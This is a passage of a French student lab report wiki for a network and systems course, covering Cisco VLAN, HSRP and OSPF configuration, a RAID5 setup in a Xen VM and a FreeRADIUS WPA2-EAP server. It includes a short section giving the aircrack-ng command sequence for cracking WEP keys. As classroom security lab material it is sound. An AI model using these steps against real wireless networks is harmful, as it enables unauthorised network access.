  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en terminant en '''C0''' plutôt que '''B0'''&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
